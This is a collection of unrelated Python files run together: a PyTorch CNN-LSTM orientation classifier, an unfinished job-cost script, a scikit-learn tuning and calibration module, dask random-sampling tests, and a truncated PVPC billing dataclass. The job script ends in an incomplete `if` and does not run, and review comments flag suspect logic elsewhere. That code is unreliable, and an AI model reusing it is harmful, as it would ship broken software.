            nn.Conv2d(in_channels=6, out_channels=12, kernel_size=5),
            nn.MaxPool2d(2, 2),
            Flatten(),
            nn.Linear(in_features=12 * 4 * 4, out_features=120),
            nn.ReLU(),
            nn.Linear(in_features=120, out_features=60),
            nn.ReLU(),
            nn.Linear(in_features=60, out_features=16),
            nn.ReLU(),
        ]
        self.frame = nn.Sequential(*layers)
network=Network()
#pre-train network that has ~50% accuracy
# Load pretrained weights from an absolute Windows path, then strip the last
# two children (the final ReLU and the Linear(60, 16) classifier head) so the
# remainder acts as a 60-dim feature extractor.
network.frame.load_state_dict(torch.load(os.path.join('E:\\', 'Abolfazl' , '2ndYearproject','code','savedNetworks','orientationClassifier')))
newnet=torch.nn.Sequential(*(list(network.frame.children()))[:-1])
newnet=torch.nn.Sequential(*(list(newnet.children()))[:-1])
import torch
import torch.optim as optim
from echotorch.datasets.NARMADataset import NARMADataset
import echotorch.nn as etnn
import echotorch.utils
import torch.nn as nn
from torch.autograd import Variable
from torch.utils.data.dataloader import DataLoader
import numpy as np
import mdp
import matplotlib.pyplot as plt
import torch.nn.functional as F
import pdb
# Parameters
# Hyper-parameters and data-shape constants used by the column model below.
spectral_radius = 0.9
leaky_rate = 0.5
learning_rate = 0.005
firstLayerSize = 5
n_hidden = 200          # LSTM hidden size
n_iterations = 20       # training epochs
train_sample_length = 5000
test_sample_length = 1000
n_train_samples = 2
n_test_samples = 1
batch_size = 11
momentum = 0.95
weight_decay = 0
numOfClasses=22         # must match len(classes) defined below
numOfFrames=330         # frames per sequence fed to the LSTM
lastLayerSize=60        # output dim of the truncated pretrained front end
train_leaky_rate=False
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
import os
import numpy as np
import matplotlib.pyplot as plt
import torch.optim as optim
import time
from torch.autograd import Variable
import torch.nn.functional as F
import torchvision.datasets as dset
from tomDatasetFrameSeriesAllClassesFixedOri import tomImageFolderFrameSeriesAllClasses
# Grayscale 28x28 tensors normalized to roughly [-1, 1].
transform = transforms.Compose(
    [transforms.Grayscale(num_output_channels=1),
     transforms.Resize((28,28)),
     transforms.ToTensor(),
     transforms.Normalize((0.5,), (0.5,))])
# NOTE(review): train and test sets load the SAME folder -- confirm intended.
train_set = tomImageFolderFrameSeriesAllClasses(root=os.path.join('E:\\', 'Abolfazl' , '2ndYearproject' , 'datasets','fixedOrirentation' ),transform=transform)
test_set = tomImageFolderFrameSeriesAllClasses(root=os.path.join('E:\\', 'Abolfazl' , '2ndYearproject' , 'datasets','fixedOrirentation' ),transform=transform)
# 22 orientation class labels, one per model output.  Fix: a missing comma
# previously fused 'Ori16' and 'Ori17' into a single 'Ori16Ori17' element,
# leaving only 21 labels despite numOfClasses = 22.
classes = ('Ori1', 'Ori2', 'Ori3', 'Ori4', 'Ori5', 'Ori6', 'Ori7', 'Ori8',
           'Ori9', 'Ori10', 'Ori11', 'Ori12', 'Ori13', 'Ori14', 'Ori15',
           'Ori16', 'Ori17', 'Ori18', 'Ori19', 'Ori20', 'Ori21', 'Ori22')
#classes=('Ori1','Ori2','Ori3','Ori4','Ori5','Ori6','Ori7','Ori8','Ori9','Ori10','Ori11','Ori12','Ori13','Ori14','Ori15','Ori16')
train_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size,shuffle=True, num_workers=2)
test_loader = torch.utils.data.DataLoader(test_set, batch_size=batch_size,shuffle=True, num_workers=2)
# Use CUDA?
use_cuda = False
use_cuda = torch.cuda.is_available() if use_cuda else False
# Manual seed
mdp.numx.random.seed(1)
np.random.seed(2)
torch.manual_seed(1)
def param_printer(layer):
    """Dump every parameter tensor owned by ``layer`` to stdout."""
    for weights in layer.parameters():
        print(weights)
def printIfReqGrad(layer):
    """Print the ``requires_grad`` flag of each parameter of ``layer``."""
    for weights in layer.parameters():
        print(weights.requires_grad)
def freeze_layer(layer):
    """Turn off gradient tracking for all parameters of ``layer``."""
    for weights in layer.parameters():
        weights.requires_grad = False
# cortical column
class column(nn.Module):
    """
    Cortical-column model: a frozen, pre-trained CNN front end feeding a
    single-layer LSTM whose hidden states are projected onto per-frame
    class scores by a linear read-out.
    """
    def __init__(self, preTrainedModel):
        super(column, self).__init__()
        self.frontEnd = preTrainedModel
        self.lstm = torch.nn.LSTM(lastLayerSize, n_hidden, batch_first=True)
        self.outLinear = nn.Linear(n_hidden, numOfClasses, bias=True)

    def forward(self, x, y=None):
        """Run the front end frame-by-frame, then the LSTM and read-out.

        Returns per-frame class scores shaped
        (batch_size, numOfFrames, numOfClasses). ``y`` is accepted but
        unused, matching the original call signature.
        """
        # Feature buffer pre-filled with NaN so any unwritten slot is
        # obvious while debugging.
        features = torch.FloatTensor(
            np.full((batch_size, numOfFrames, lastLayerSize), np.nan))
        for sample_idx in range(batch_size):
            frames = x[sample_idx, :, :, :].unsqueeze(1)
            # detach(): the frozen front end must not receive gradients.
            features[sample_idx, :, :] = self.frontEnd(frames).detach()
        sequence_out, (h_n, c_n) = self.lstm(features)
        return self.outLinear(sequence_out)
# end class definition
# Build the full model: frozen CNN front end + trainable LSTM classifier.
c1=column(newnet)
if use_cuda:
    c1.cuda()
# end if
# Objective function
criterion = nn.CrossEntropyLoss()
# Adam optimiser (momentum/weight_decay arguments kept commented for reference)
optimizer = optim.Adam(c1.parameters(),lr=learning_rate)#, lr=learning_rate, momentum=momentum, weight_decay=weight_decay)
#freezing the pretrained front end
freeze_layer(c1.frontEnd)
# For each iteration
for epoch in range(n_iterations):
    # Iterate over batches
    i=1
    for data in train_loader:
        # Inputs and outputs
        inputs, targets = data
        inputs, targets = Variable(inputs), Variable(targets)
        if use_cuda: inputs, targets = inputs.cuda(), targets.cuda()
        # Gradients to zero
        optimizer.zero_grad()
        # Forward
        out = c1(inputs,targets)
        # CrossEntropyLoss expects (batch, classes, seq), so permute the
        # (batch, seq, classes) LSTM output.
        loss = criterion(out.permute(0,2,1), targets.long())
        loss.backward(retain_graph=True)
        # Optimize
        optimizer.step()
        # Print error measures
        print(u"Train CrossEntropyLoss: {}".format(float(loss.data)))
        i+=1
    # Monitor the forget-gate input weights (rows 200:400 of weight_ih_l0).
    print('Forget Gate Sum', sum(sum(c1.lstm.weight_ih_l0[200:400])))
# end for
# Test reservoir
dataiter = iter(test_loader)
# BUG FIX: DataLoader iterators no longer expose a Python-2 style `.next()`
# method in modern PyTorch; the builtin `next()` works on all versions.
test_u, test_y = next(dataiter)
test_u, test_y = Variable(test_u), Variable(test_y)
if use_cuda: test_u, test_y = test_u.cuda(), test_y.cuda()
y_predicted = c1(test_u)
testResutls=torch.max(y_predicted[0],dim=1)
# Indices of the frames misclassified for the first test sample.
showMe=testResutls[1]-test_y[0]
[i for i, e in enumerate(showMe) if e != 0]
#save network parameters for the record
# NOTE(review): this saves the ORIGINAL pre-trained `network.frame`, not the
# freshly trained `c1`; given the 'LSTMForFixedOriObj' filename this looks
# like it should be `c1.state_dict()` -- confirm before relying on it.
torch.save(network.frame.state_dict(), os.path.join('E:\\', 'Abolfazl' , '2ndYearproject','code','savedNetworks','LSTMForFixedOriObj'))
#function for ploting convolutional kernels
def plot_kernels(tensor, num_cols=6):
    """Plot the first channel of each convolution kernel in a grid.

    Parameters
    ----------
    tensor : array-like of shape (num_kernels, in_channels, kh, kw)
        Kernel weights; only channel 0 of each kernel is shown.
    num_cols : int, default 6
        Number of columns in the subplot grid.
    """
    num_kernels = tensor.shape[0]
    # BUG FIX: rows were computed with floor division, so any partial row
    # (e.g. 8 kernels with 6 columns) made add_subplot() fail with an index
    # outside the grid, and fewer than num_cols kernels produced 0 rows.
    num_rows = -(-num_kernels // num_cols)  # ceiling division
    fig = plt.figure(figsize=(num_cols,num_rows))
    for i in range(num_kernels):
        ax1 = fig.add_subplot(num_rows,num_cols,i+1)
        ax1.imshow(tensor[i][0,:,:], cmap='gray')
        ax1.axis('off')
        ax1.set_xticklabels([])
        ax1.set_yticklabels([])
#ploting the first conv2d layer's kernels
plot_kernels(list(c1.frontEnd.state_dict().values())[0])
#plot output layer
# NOTE(review): numpy and matplotlib were already imported above; these
# re-imports are redundant but harmless.
import numpy as np
import matplotlib.pyplot as plt
plt.figure()
# Heat-map of the final linear read-out's weight matrix.
plt.pcolor(c1.outLinear.weight.detach());
plt.colorbar()
plt.show()
|
class Job:
    """A job record: release time (`available`), `cost`, and `work` amount."""

    def __init__(self, available, cost, work):
        self.available, self.cost, self.work = available, cost, work
def minimum(job, D):
    """Apparently meant to compute a minimum cost to cover ``D`` work (UNFINISHED).

    NOTE(review): the body below is truncated -- the final ``if`` on the
    last line has no condition completion or body, which is a SyntaxError,
    and the function never returns anything. The greedy selection (jobs
    ranked by work-per-cost, filtered by availability) was never finished;
    TODO reconstruct the intended algorithm before using this module.
    """
    # Jobs ordered by the time they become available.
    job_a = sorted(job,key=lambda l:l.available)
    for i in range(len(job)):
        print(job_a[i].available,job_a[i].cost,job_a[i].work)
    # Jobs ordered by work-per-unit-cost, best first.
    job_c = sorted(job,key=lambda l:l.work/l.cost,reverse=True)
    # Remaining work after the earliest-available job -- TODO confirm intent.
    W=D-job_a[0].work
    for i in range(len(job)):
        print(job_c[i].available,job_c[i].cost,job_c[i].work)
    for i in range(len(job)):
        for j in range(1,len(job)):
            if job_c[j].available<=job_a[i].available:
                if job_c[j-1].work
if __name__=="__main__":
    # Read "N D" from the first line, then one "available cost work"
    # triple per job from the next N lines.
    job=[]
    N,D=input().split()
    for i in range(int(N)):
        a,c,p=list(map(int,input().rstrip().split()))
        job.append(Job(a,c,p))
    # job = [Job(1, 2, 50), Job(3, 5, 20),
    #        Job(6, 19, 100), Job(2, 100, 200)]
    print(minimum(job,int(D)))
# Sample input kept by the author as a module-level string:
'''
3 3
1 1 1
2 2 2
3 1 5
'''
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tues Jul 21
@author: Sebastian Gonzalez
"""
####################################
### Neccessary Import Statements ###
####################################
# Data Manipulation
import numpy as np
# Model Classes
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.calibration import CalibratedClassifierCV
# Model Evaluation Tools
from sklearn.model_selection import GridSearchCV, RandomizedSearchCV, train_test_split
import scipy.stats as stats
# Project Tools
from src.data_scripts.feature_engineering import bow_data_loader
from src.model_scripts import model_evaluation as me
####################################
### Define our Modular Functions ###
####################################
def label_transformer(labels_arr: np.array):
    """
    Map an array of string class labels to a numerical labels array.

    Parameters
    ----------
    labels_arr : Numpy Array
        Class labels (as strings) for every training instance.

    Returns
    -------
    to_return : (dict, Numpy Array)
        A ``(mapper, numerical_labels)`` tuple: ``mapper`` maps each unique
        string label to the integer it was replaced with (labels are
        numbered 0..n-1 in alphabetical order) and ``numerical_labels`` is
        the integer labels array in the original instance order.

    Raises
    ------
    AssertionError
        If the elements of ``labels_arr`` are not strings, or if the
        resulting array differs in size from the input.

    References
    ----------
    1. https://numpy.org/doc/stable/reference/generated/numpy.unique.html
    2. https://numpy.org/doc/stable/reference/generated/numpy.searchsorted.html
    """
    # The labels must be strings (plain Python or numpy flavour).
    assert any([isinstance(labels_arr[0], np.str_),
                isinstance(labels_arr[0], str)])
    # np.unique returns the unique labels already sorted alphabetically.
    unique_labels_arr = np.unique(labels_arr)
    # Pair each unique label with a sequential numerical value.
    labels_mapper = dict(
        zip(unique_labels_arr.tolist(),
            list(range(0, unique_labels_arr.size)))
    )
    # BUG FIX: the original replaced labels in-place inside the string
    # array, so a freshly written numeric value (stored back as e.g. the
    # string "1") could be matched AGAIN by a later string label "1" and
    # remapped a second time, corrupting earlier assignments. Looking every
    # label up against the sorted unique array is a single vectorized
    # operation with no aliasing.
    numerical_labels_arr = np.searchsorted(unique_labels_arr, labels_arr)
    assert numerical_labels_arr.size == labels_arr.size
    to_return = (labels_mapper, numerical_labels_arr.astype(int))
    return to_return
def cv_hyperparamter_tuning(
        model,
        mode: str,
        run_brute=False,
        **kwargs):
    """
    Tune an instantiated Sklearn model with cross-validated searches.

    A ``RandomizedSearchCV`` is always run over a pre-defined (and
    optionally user-extended) parameter distribution. When ``run_brute``
    is True, a narrowed ``GridSearchCV`` is then run around the best
    parameters found by the randomized search.

    Parameters
    ----------
    model : Sklearn model object
        The instantiated estimator whose hyper-parameters are tuned.
    mode : str
        Model family; one of "svm", "nb", "rf", "lr", "adab" or "knn".
        Any other value raises a ``ValueError``.
    run_brute : Bool; default False
        Whether to follow the randomized search with a brute-force grid
        search around its best parameters.
    **kwargs : dict
        Accepted keyword arguments:
          1. "x_train" (REQUIRED) - feature matrix for fitting the search.
          2. "y_train" (REQUIRED) - labels array for fitting the search.
          3. "k_value" - CV folds for both searches (default 5).
          4. "k_value_random" - folds for the randomized search only
             (defaults to ``k_value``).
          5. "k_value_brute" - folds for the brute search only (defaults
             to ``k_value``; ignored when ``run_brute`` is False).
          6. "scoring_method" - scoring method the search(es) optimize.
          7. "custom_search_grid" - dict of additions/overrides for the
             randomized-search grid; must be a dict, otherwise a
             ``ValueError`` is raised.

    Returns
    -------
    to_return : Sklearn model object
        The best estimator found by the search(es).

    Raises
    ------
    ValueError
        If ``mode`` is not accepted, the training data is incomplete, or
        "custom_search_grid" is not a dict.

    References
    ----------
    1. https://scikit-learn.org/stable/modules/grid_search.html#grid-search
    2. https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html#sklearn.model_selection.GridSearchCV
    3. https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.RandomizedSearchCV.html#sklearn.model_selection.RandomizedSearchCV
    4. https://scikit-learn.org/stable/modules/model_evaluation.html#scoring-parameter
    5. https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.uniform.html
    """
    # Per-family distributions the randomized search samples from.
    parameters_to_tune_dict = {
        "svm": {
            "C": stats.uniform(loc=1, scale=999),
            "decision_function_shape": ["ovo", "ovr"],
            "gamma": ["scale", "auto"]
        },
        "nb": {
            "var_smoothing": stats.uniform(loc=0, scale=1e-5)},
        "rf": {
            "max_features": ["auto", "sqrt", "log2"],
            "min_samples_leaf": stats.randint(low=1, high=4),
            "max_depth": stats.randint(low=1, high=6)
        },
        "lr": {
            "C": stats.uniform(loc=1, scale=999),
            "l1_ratio": stats.uniform(loc=0, scale=1)
        },
        "adab": {
            "n_estimators": stats.randint(low=30, high=70),
            "learning_rate": stats.uniform(loc=0.01, scale=0.99)
        },
        "knn": {
            "n_neighbors": stats.randint(low=2, high=7),
            "weights": ["uniform", "distance"]
        }
    }
    search_grid_dist_dict = parameters_to_tune_dict.get(mode, None)
    if isinstance(search_grid_dist_dict, type(None)):
        # The user did not specify an accepted value for `mode`.
        error_message = "The passed-in value for the mode parameter ({}) \
is not an accepted value. \nSee function doc-string for accepted \
parameter values.".format(mode)
        raise ValueError(error_message)
    x_train = kwargs.get("x_train", None)
    y_train = kwargs.get("y_train", None)
    if any([
        isinstance(x_train, type(None)), isinstance(y_train, type(None))
    ]):
        # The user did not specify a complete training data set.
        error_message = "The function expected a complete training data \
set to be passed in to the `x_train` and `y_train` keyword arguments. \
However, neither required keyword arguments were used. \nSee function \
docstring for more information."
        raise ValueError(error_message)
    k_value = kwargs.get("k_value", 5)
    k_value_random = kwargs.get("k_value_random", k_value)
    k_value_brute = kwargs.get("k_value_brute", k_value)
    scoring_method = kwargs.get("scoring_method", None)
    custom_search_grid = kwargs.get("custom_search_grid", {})
    if not isinstance(custom_search_grid, dict):
        error_message = "The passed-in value for the `custom_search_grid` \
keyword argument was of type `{}`. \nIt must be of type \
`dict`.".format(type(custom_search_grid))
        raise ValueError(error_message)
    search_grid_dist_dict.update(custom_search_grid)
    # Start with a RandomizedSearch to narrow down the range of the
    # optimal hyperparameter values.
    random_search = RandomizedSearchCV(
        estimator=model,
        param_distributions=search_grid_dist_dict,
        scoring=scoring_method,
        random_state=169,
        cv=k_value_random,
        refit=True)
    random_search_result = random_search.fit(x_train, y_train)
    if run_brute:
        # With this narrowed range of values, perform a brute-force
        # standard grid search around the randomized-search optimum.
        random_best_params_dict = random_search_result.best_params_
        search_grid_narrow_dict = random_best_params_dict.copy()
        # Hoisted out of the loop below (loop-invariant constants): which
        # parameter names get which kind of numeric grid.
        params_with_large_cont_vals = ["C"]
        params_with_int_vals = ["min_samples_leaf",
                                "max_depth",
                                "n_estimators",
                                "n_neighbors",
                                "degree"]
        params_in_unit_interval = ["var_smoothing",
                                   "l1_ratio",
                                   "learning_rate",
                                   "tol",
                                   "min_samples_split",
                                   "min_samples_leaf",
                                   "max_samples"]
        for key, value in random_best_params_dict.items():
            if isinstance(value, (int, float)):
                # Numeric best value: build a small grid around it.
                if key in params_with_large_cont_vals:
                    # Continuous parameter that may exceed [0, 1].
                    new_grid_values = np.arange(start=value - 2,
                                                stop=value + 2.5,
                                                step=0.5)
                    # BUG FIX: these parameters (e.g. C) must be STRICTLY
                    # positive; the previous ">= 0" filter could leave
                    # C == 0 in the grid and crash the grid search.
                    final_grid_values = new_grid_values[new_grid_values > 0]
                    search_grid_narrow_dict[key] = final_grid_values.tolist()
                elif key in params_with_int_vals:
                    # Integer-valued parameter; values must stay > 0.
                    new_grid_values = np.arange(start=value - 1,
                                                stop=value + 2)
                    final_grid_values = new_grid_values[new_grid_values > 0]
                    search_grid_narrow_dict[key] = final_grid_values.tolist()
                elif key in params_in_unit_interval:
                    # Continuous parameter restricted to (0, 1].
                    new_grid_values = np.arange(start=value - 0.1,
                                                stop=value + 0.2,
                                                step=0.1)
                    unit_interval_checker = np.logical_and(
                        new_grid_values > 0, new_grid_values <= 1)
                    final_grid_values = new_grid_values[unit_interval_checker]
                    search_grid_narrow_dict[key] = final_grid_values.tolist()
            elif isinstance(value, str):
                # String best value: no grid to build, just enclose the
                # value in a list to satisfy the schema that the
                # `GridSearchCV()` parameter grid expects.
                search_grid_narrow_dict[key] = [value]
        brute_search = GridSearchCV(estimator=model,
                                    param_grid=search_grid_narrow_dict,
                                    scoring=scoring_method,
                                    cv=k_value_brute,
                                    refit=True)
        brute_search_result = brute_search.fit(x_train, y_train)
        to_return = brute_search_result.best_estimator_
    else:
        # No brute-force pass requested: simply return the best estimator
        # found by the Randomized Search.
        to_return = random_search_result.best_estimator_
    return to_return
def model_fitting(
        parent_class_label,
        mode: str,
        calibrate_probs=True,
        run_cv_tuning=True,
        **kwargs):
    """
    Fit (and optionally tune and calibrate) a Sklearn classifier for the
    specified dataset.

    Parameters
    ----------
    parent_class_label : NoneType or str
        Which parent class' data to load via ``bow_data_loader`` (pass
        "parents" for the tier-1 class labels themselves). When set to
        ``None``, the training data must instead be supplied through the
        ``child_class_data`` keyword argument as a
        ``(feature_matrix, labels_array)`` tuple of Numpy arrays.
    mode : str
        Model family to fit; one of "svm", "nb", "rf", "lr", "adab" or
        "knn". Any other value raises a ``ValueError``.
    calibrate_probs : Bool; default True
        Whether to calibrate the predicted class-membership probabilities
        with ``CalibratedClassifierCV``: both sigmoid and isotonic
        calibrations are fitted and the one with the lower Brier score on
        the test split is kept.
    run_cv_tuning : Bool; default True
        Whether to tune hyper-parameters with ``cv_hyperparamter_tuning``.
    **kwargs : dict
        Accepted keyword arguments:
          1. "test_data_frac" - train/test split fraction in [0, 1]
             (default 0.25).
          2. "k_value" - CV folds used for probability calibration
             (ignored when ``calibrate_probs`` is False); default 5.
          3. "child_class_data" - ``(feature_matrix, labels_array)``
             tuple used when ``parent_class_label`` is ``None``.

    Returns
    -------
    to_return : Sklearn model object
        The fitted (and possibly tuned and/or calibrated) model.

    Raises
    ------
    ValueError
        If ``mode`` is not supported, or the user-supplied data is
        missing or has an unsupported label dtype.

    References
    ----------
    1. https://scikit-learn.org/stable/modules/calibration.html
    2. https://scikit-learn.org/stable/modules/generated/sklearn.calibration.CalibratedClassifierCV.html#sklearn.calibration.CalibratedClassifierCV
    3. https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html
    4. https://scikit-learn.org/stable/modules/generated/sklearn.metrics.brier_score_loss.html#sklearn.metrics.brier_score_loss
    """
    # First, collect all necessary variables.
    normalized_mode = "".join(mode.lower().split())
    accepted_modes = ["svm", "nb", "rf", "lr", "adab", "knn"]
    if normalized_mode not in accepted_modes:
        error_message = "The passed-in value for the mode parameter ({}) \
is not an accepted value. \nSee function doc-string for accepted \
parameter values.".format(mode)
        raise ValueError(error_message)
    test_data_frac = kwargs.get("test_data_frac", 0.25)
    k_value = kwargs.get("k_value", 5)
    # Next, obtain the data that we will be needing.
    if isinstance(parent_class_label, type(None)):
        # The caller supplies the data through `child_class_data` instead
        # of loading it with `bow_data_loader`.
        feature_matrix, raw_labels_arr = kwargs.get("child_class_data",
                                                    (None, None))
        if any([isinstance(feature_matrix, type(None)),
                isinstance(raw_labels_arr, type(None))]):
            # The user did not correctly specify the data to use.
            error_message = "By setting `parent_class_label` to `None`, \
you have specified that you would like for this function to \
use your own data. \nHowever, you have not correctly specified \
that data. See the function docstring for how to do that \
correctly."
            raise ValueError(error_message)
        if raw_labels_arr.dtype == "int":
            # The labels array is already in numerical form.
            numerical_labels_arr = raw_labels_arr
        elif isinstance(raw_labels_arr[0], str):
            # String labels still need the numerical mapping.
            _, numerical_labels_arr = label_transformer(raw_labels_arr)
        else:
            # BUG FIX: an unsupported label dtype previously fell through
            # silently, leaving `numerical_labels_arr` undefined and
            # producing a confusing NameError at the train/test split.
            error_message = "The labels array passed through \
`child_class_data` must contain either integers or strings."
            raise ValueError(error_message)
    else:
        # Load the data with `bow_data_loader` and transform the labels.
        feature_matrix, raw_labels_arr = bow_data_loader(parent_class_label)
        _, numerical_labels_arr = label_transformer(raw_labels_arr)
    # Now, split the obtained data (no matter how it was obtained) into
    # training and test sets.
    x_train, x_test, y_train, y_test = train_test_split(
        feature_matrix,
        numerical_labels_arr,
        test_size=test_data_frac,
        random_state=369
    )
    # Now, instantiate the necessary model for the specified mode.
    if normalized_mode == "svm":
        # Support Vector Machine classifier (probability estimates on).
        base_model = SVC(probability=True)
    elif normalized_mode == "nb":
        # Gaussian Naive Bayes classifier.
        base_model = GaussianNB()
    elif normalized_mode == "rf":
        # Random Forest classifier.
        base_model = RandomForestClassifier(random_state=169,
                                            class_weight="balanced")
    elif normalized_mode == "lr":
        # Elastic-net Logistic Regression classifier.
        base_model = LogisticRegression(penalty="elasticnet",
                                        fit_intercept=True,
                                        class_weight="balanced",
                                        solver="saga",
                                        max_iter=200)
    elif normalized_mode == "adab":
        # AdaBoost classifier.
        base_model = AdaBoostClassifier(algorithm="SAMME.R",
                                        random_state=669)
    elif normalized_mode == "knn":
        # K-Nearest-Neighbors classifier.
        base_model = KNeighborsClassifier()
    # Determine if we need to also perform a CV search for the optimal
    # settings of the model's parameters to best fit this data.
    if run_cv_tuning:
        tuned_model = cv_hyperparamter_tuning(model=base_model,
                                              mode=normalized_mode,
                                              x_train=x_train,
                                              y_train=y_train)
    else:
        tuned_model = base_model
    # Determine if we need to also calibrate the probability predictions.
    if calibrate_probs:
        # Fit both calibration flavours ...
        # NOTE(review): `base_estimator` was renamed `estimator` in
        # scikit-learn >= 1.2 -- confirm the pinned sklearn version.
        calib_sigmoid_model = CalibratedClassifierCV(
            base_estimator=tuned_model, cv=k_value, method="sigmoid")
        calib_isotonic_model = CalibratedClassifierCV(
            base_estimator=tuned_model, cv=k_value, method="isotonic")
        calib_sigmoid_model.fit(x_train, y_train)
        calib_isotonic_model.fit(x_train, y_train)
        calibrated_models_list = [calib_sigmoid_model,
                                  calib_isotonic_model]
        # ... and keep the one with the lower (better) Brier score on the
        # held-out test split.
        prob_dist_sigmoid = calib_sigmoid_model.predict_proba(x_test)
        prob_dist_isotonic = calib_isotonic_model.predict_proba(x_test)
        sigmoid_brier = me.multiple_brier_score_loss(
            y_test,
            prob_dist_sigmoid
        )
        isotonic_brier = me.multiple_brier_score_loss(
            y_test, prob_dist_isotonic
        )
        best_calib_index = np.argmin([sigmoid_brier, isotonic_brier])
        final_model = calibrated_models_list[best_calib_index]
    else:
        # No calibration requested.
        final_model = tuned_model
    to_return = final_model
    return to_return
def models_comparison(parent_class_label: str, models_to_fit="all"):
    """
    Fit several classifier families on the data of a given parent class
    and return the fitted model that scores best on a held-out test set.

    Parameters
    ----------
    parent_class_label : str
        Which parent class' child-class data to load (pass "parents" for
        the tier-1 class labels themselves).
    models_to_fit : str or list; default "all"
        Either the string "all" (fit every supported family: "svm", "nb",
        "rf", "lr", "adab" and "knn") or an explicit list of those mode
        strings.

    Returns
    -------
    to_return : Sklearn model object
        The fitted model whose Hamming-loss metric on the compiled test
        predictions is lowest (chosen with ``np.argmin`` below).
    """
    # First, collect all necessary variables that will be used for the
    # rest of the function.
    if models_to_fit == "all":
        actual_models_to_fit = ["svm", "nb", "rf", "lr", "adab", "knn"]
    else:
        actual_models_to_fit = models_to_fit
    # Next load in the data that will be used to train and evaluate the
    # resulting models.
    feature_matrix, raw_labels_arr = bow_data_loader(parent_class_label)
    _, numerical_labels_arr = label_transformer(raw_labels_arr)
    x_train, x_test, y_train, y_test = train_test_split(feature_matrix,
                                                        numerical_labels_arr,
                                                        test_size=0.25,
                                                        random_state=569)
    # Now, use the `model_fitting()` function defined above to obtain
    # a collection of fitted models (each is trained on a further split
    # of the training partition only).
    best_models_list = [
        model_fitting(
            parent_class_label=None,
            mode=model_name,
            child_class_data=(x_train, y_train),
            test_data_frac=0.15
        ) for model_name in actual_models_to_fit
    ]
    # With these fitted models, use the tools in the `model_evaluation`
    # module to determine which one is best. Return the one that is
    # best.
    unique_x_test, one_hot_y_test = me.true_classes_compilation(x_test,
                                                                y_test)
    num_class_labels = one_hot_y_test.shape[1]
    compiled_predictions_list = [
        me.predicted_classes_compilation(
            ml_model=model,
            test_feature_matrix=unique_x_test,
            available_labels_arr=np.arange(0, num_class_labels),
            closeness_threshold=0.05
        ) for model in best_models_list
    ]
    metrics_list = [
        me.metric_reporter("hamming", one_hot_y_test, prediction)
        for prediction in compiled_predictions_list
    ]
    # Lower Hamming loss is better, hence argmin.
    index_of_best_model = np.argmin(metrics_list)
    best_model = best_models_list[index_of_best_model]
    to_return = best_model
    return to_return
def save_model(parent_class_label: str, run_comparison=True, **kwargs):
    """
    Persist a fitted model for the given parent class (NOT IMPLEMENTED).

    NOTE(review): this is a stub -- it currently ignores all of its
    arguments and always returns ``None``.

    Parameters
    ----------
    parent_class_label : str
        Which parent class' model to save (pass "parents" for the tier-1
        class labels themselves).
    run_comparison : Bool
        Presumably whether to pick the model via ``models_comparison()``
        before saving -- unused in this stub; verify once implemented.
    **kwargs : dict
        Unused in this stub.

    Returns
    -------
    to_return : NoneType
        Always ``None`` until the function is implemented; intended to be
        a string indicating whether the save succeeded.
    """
    to_return = None
    ###
    return to_return
def load_model(parent_class_label: str, **kwargs):
    """
    Load a previously saved model for the given parent class
    (NOT IMPLEMENTED).

    NOTE(review): this is a stub -- it currently ignores all of its
    arguments and always returns ``None``.

    Parameters
    ----------
    parent_class_label : str
        Which parent class' model to load (pass "parents" for the tier-1
        class labels themselves).
    **kwargs : dict
        Unused in this stub.

    Returns
    -------
    to_return : NoneType
        Always ``None`` until the function is implemented.
    """
    to_return = None
    ###
    return to_return
|
import dask.bag as db
from dask.bag import random
def test_choices_size():
    """choices() draws exactly k items, each coming from the population."""
    population = range(20)
    bag = db.from_sequence(population, npartitions=3)
    sampled = list(random.choices(bag, k=2).compute())
    assert len(sampled) == 2
    assert all(item in population for item in sampled)
def test_choices_size_over():
    """Sampling with replacement may request more items than exist."""
    population = range(3)
    bag = db.from_sequence(population, npartitions=3)
    sampled = list(random.choices(bag, k=4).compute())
    assert len(sampled) == 4
    assert all(item in population for item in sampled)
def test_choices_size_over_repartition():
    """k exceeds the element count of some partitions after a repartition."""
    population = range(10)
    bag = db.from_sequence(population, partition_size=9).repartition(3)
    sampled = list(random.choices(bag, k=2).compute())
    # The repartition leaves a lopsided layout on purpose.
    assert bag.map_partitions(len).compute() == (9, 0, 1)
    assert len(sampled) == 2
    assert all(item in population for item in sampled)
def test_choices_size_over_perpartition():
    """k exceeds the element count of one partition."""
    population = range(10)
    bag = db.from_sequence(population, partition_size=9)
    sampled = list(random.choices(bag, k=2).compute())
    assert len(sampled) == 2
    assert all(item in population for item in sampled)
def test_choices_size_over_two_perpartition():
    """k exceeds the combined element count of two partitions."""
    population = range(10)
    bag = db.from_sequence(population, partition_size=9)
    sampled = list(random.choices(bag, k=10).compute())
    assert len(sampled) == 10
    assert all(item in population for item in sampled)
|
# -*- coding: utf-8 -*-
"""Electrical billing for small consumers in Spain using PVPC. Base dataclass."""
import json
from datetime import datetime
from enum import Enum
import attr
import cattr
# Serialization hooks for datetimes and Enums: Enums round-trip through
# their .value, datetimes through a fixed second-resolution string.
cattr.register_unstructure_hook(Enum, lambda e: e.value)
cattr.register_structure_hook(Enum, lambda s, enum_cls: enum_cls(s))
# NOTE: naive format with no timezone info — both directions must agree on it.
time_format = "%Y-%m-%d %H:%M:%S"
cattr.register_unstructure_hook(datetime, lambda dt: dt.strftime(time_format))
cattr.register_structure_hook(datetime, lambda s, _: datetime.strptime(s, time_format))
@attr.s
class Base:
    """
    Base dataclass to store information related to the electric bill.

    * Implements instance methods to serialize the data to dict or JSON
    * And class constructors to rebuild instances from those representations
      (`from_dict` / `from_json`)
    """
    def to_dict(self):
        """
        Generate dict representation.

        To be stored or shared, so it can be retrieved again with
        `bill = FacturaData.from_dict(data)`
        """
        # cattr applies the Enum/datetime hooks registered at module level.
        return cattr.unstructure(self)
    def to_json(self, indent=2, **kwargs) -> str:
        """
        Generate JSON representation.

        To be stored or shared, so it can be retrieved again with
        `bill = FacturaData.from_json(json_data)`
        """
